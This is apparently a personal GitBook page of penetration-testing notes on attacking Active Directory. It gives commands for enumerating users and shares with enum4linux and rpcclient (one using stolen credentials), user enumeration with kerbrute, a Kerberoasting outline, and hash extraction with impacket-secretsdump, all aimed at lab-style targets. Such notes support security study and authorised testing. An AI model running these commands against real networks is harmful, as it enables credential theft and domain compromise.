👨‍💻
Hacking Notes
  • Hacking Notes
  • 💅One-Liners
  • ⚔️Offensive
    • Exploit Workflow
    • Recon
      • OSINT
      • DNS
        • Domain Discovery
      • Layer 2 Config and Analysis
      • Port Scanning and Discovery
      • Port Attacks
      • Link it all together
    • Payloads
      • MSFVenom
      • Reverse Shells
    • Websites
      • Enumeration
      • Injection/LFI
      • Session Management
      • Brute Forcing
      • JavaScript & XSS
      • SSRF
      • XXE
      • PHP
    • Password Attacks
      • Brute Forcing
      • Mimikatz
      • Password Cracking
      • Hash Extraction
      • Wordlist Generation
    • Databases
      • SQL
      • Mongodb
    • Microsoft Windows Exploits
      • Enumeration
      • Powershell
      • Cmd
      • Privilege Escalation
      • Active Directory
      • Bloodhound
    • Social Engineering
    • Netcat & Socat
    • File Transfers
    • Metasploit
      • Writing Modules
    • PS Empire
    • Priv Escalation
    • Post Exploitation
    • Pivoting
    • Certs and Secrets
    • NGROK
    • Misc.
  • 🛡️Defensive
    • Defensive Notes
    • Windows Forensics
      • Program Execution Artifacts
      • ASEP Locations
      • Event Logs
    • Linux Forensics
    • Network Forensics
      • tshark
      • Wireshark Filters
    • Memory Forensics
    • Stego
    • Malware Analysis
    • Volatility
  • 🌩️Cloud
    • Scope and Shared Responsibility
    • AWS CLI
    • Azure CLI
    • SaaS Attacks
    • PaaS
  • ⌨️Programming
    • Programming Notes
    • Examples and Quick Scripts
    • PowerShell
    • Pwn
      • Windows Pwn
    • Python
      • Basic Python
      • Modules
      • Working with Files
      • Networking
      • Attack Related
      • Scapy
        • Using Scapy
        • Reading PCAP
    • C
      • Code Examples
      • GDB
    • PHP
Powered by GitBook
On this page
  • Attack Workflow
  • enum4linux
  • rpcclient
  • Password Spraying
  • Kerberos
  • Kerberoasting
  • secretsdump

Was this helpful?

  1. Offensive
  2. Microsoft Windows Exploits

Active Directory

Attack Workflow

Determine what ports are open

Enumerate with

enum4linux

Used to enumerate a huge amount of AD information from the command line.

enum4linux -a 10.1.1.10        # Attempts to enumerate everything at target
enum4linux -u administrator -p password -U 10.1.1.10    # Use stolen creds to enumerate all users
enum4linux -S 10.1.1.10        # Attempt to gather SMB shares

rpcclient

Used to enumerate information about system over RPC

Gather a list of accounts with rpcclient and save

rpcclient -U 'GOBLINS\printerldap%SecurePassword1' 10.0.0.1 -c 'enumdomusers;exit' | awk -F '[' '{print $2}' | awk -F ']' '{print $1}' > goblinUsers.txt

Password Spraying

Using a tool such as Talon can run password spray attacks across an AD env

Kerberos

./kerbrute_linux_amd64 userenum --dc 10.10.107.154 -d spookysec.local ../userlist.txt

Kerberoasting

Using a valid account on a pwned box, we can gather tickets for service accounts and extract the hash to crack. We must find all accounts in AD which have a SPN (Service Principle Name), then request RC4 tickets from the DC.

secretsdump

Used to extract hashes from a server. Below command will get NTDS.dit, assuming that you have an account with those permissions.

impacket-secretsdump -just-dc backup:backup2517860@10.10.107.154
PreviousPrivilege EscalationNextBloodhound

Last updated 2 years ago

Was this helpful?

Kerbrute, used to run various kerberos attacks. Written in Go.

⚔️
https://github.com/ropnop/kerbrute
https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg
AD Detailed Mind Map